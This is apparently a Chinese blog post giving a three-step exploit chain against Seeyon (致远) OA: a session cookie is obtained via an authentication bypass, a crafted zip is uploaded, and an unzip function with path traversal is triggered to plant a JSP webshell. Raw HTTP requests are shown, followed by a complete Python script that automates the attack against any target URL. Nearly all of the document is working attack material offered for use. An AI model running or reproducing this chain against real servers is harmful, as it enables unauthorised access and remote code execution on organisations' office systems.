【New】致远 OA 组合 getshell

1.获取cookie信息  2.上传压缩文件   3.解压压缩文件得到shell

/seeyon/thirdpartyController.do

POST /seeyon/thirdpartyController.do HTTP/1.1Host: 192.168.1.88:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 133
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

/seeyon/fileUpload.do?method=processUpload&maxSize=

POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1Host: 192.168.1.88:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://192.168.1.88:8080/seeyon/fileUpload.do?method=processUpload&maxSize=Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6DNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------------1416682316313Content-Length: 1179
-----------------------------1416682316313Content-Disposition: form-data; name="type"

-----------------------------1416682316313Content-Disposition: form-data; name="extensions"

-----------------------------1416682316313Content-Disposition: form-data; name="applicationCategory"

-----------------------------1416682316313Content-Disposition: form-data; name="destDirectory"

-----------------------------1416682316313Content-Disposition: form-data; name="destFilename"

-----------------------------1416682316313Content-Disposition: form-data; name="maxSize"

-----------------------------1416682316313Content-Disposition: form-data; name="isEncrypt"

-----------------------------1416682316313Content-Disposition: form-data; name="file1"; filename="123.zip"Content-Type: application/x-zip-compressed
zip文件-----------------------------1416682316313--

/seeyon/ajax.do

POST /seeyon/ajax.do HTTP/1.1Host: 192.168.1.88:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6DNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 142
method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2021-04-10","2708692024033719158"]

layout.xml  必须存在否则在利用解压漏洞时会解压失败空内容即可12345678.txt  可是任意名称与内容 想上传webshell替换成webshell内容与jsp后缀即可

# coding:utf-8import timeimport requestsimport reimport sysimport randomimport zipfile

la = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',           'Content-Type': 'application/x-www-form-urlencoded'}
def generate_random_str(randomlength=16):  random_str = ''  base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'  length = len(base_str) - 1  for i in range(randomlength):    random_str += base_str[random.randint(0, length)]  return random_str
mm = generate_random_str(8)
webshell_name1 = mm+'.jsp'webshell_name2 = '../'+webshell_name1
def file_zip():    shell = 'test'   ## 替换shell内容    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)    zf.writestr('layout.xml', "")    zf.writestr(webshell_name2, shell)

def Seeyon_Getshell(urllist):
    url = urllist+'/seeyon/thirdpartyController.do'    post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1"    response = requests.post(url=url, data=post, headers=la)    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():        cookie = response.cookies        cookies = requests.utils.dict_from_cookiejar(cookie)        jsessionid = cookies['JSESSIONID']        file_zip()        print( '获取cookie成功---->> '+jsessionid)        fileurl = urllist+'/seeyon/fileUpload.do?method=processUpload&maxSize='        headersfile = {'Cookie': "JSESSIONID=%s" % jsessionid}        post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',                'isEncrypt': "0"}        file = [('file1', ('test.png', open(mm+'.zip', 'rb'), 'image/png'))]        filego = requests.post(url=fileurl,data=post,files=file, headers=headersfile)        time.sleep(2)    else:        print('获取cookie失败')        exit()    if filego.text:        fileid1 = re.findall('fileurls=fileurls+","+'(.+)'', filego.text, re.I)        fileid = fileid1[0]        if len(fileid1) == 0:            print('未获取到文件id可能上传失败！')        print('上传成功文件id为---->>:'+fileid)        Date_time = time.strftime('%Y-%m-%d')        headersfile2 = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': "JSESSIONID=%s" % jsessionid}        getshellurl = urllist+'/seeyon/ajax.do'        data = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + Date_time + '%22%2C%22' + fileid + '%22%5D'        getshell = requests.post(url=getshellurl,data=data,headers=headersfile2)        time.sleep(1)        webshellurl1 = urllist + '/seeyon/common/designer/pageLayout/' + webshell_name1        shelllist = requests.get(url=webshellurl1)        if shelllist.status_code == 200:            print('利用成功webshell地址：'+webshellurl1)        else:            print('未找到webshell利用失败')


def main():    if (len(sys.argv) == 2):        url = sys.argv[1]        Seeyon_Getshell(url)    else:        print("python3 Seeyon_Getshell.py http://xx.xx.xx.xx")
if __name__ == '__main__':    main()

https://www.ailiqun.xyz/2021/04/10/%E8%87%B4%E8%BF%9COA-%E7%BB%84%E5%90%88getshell/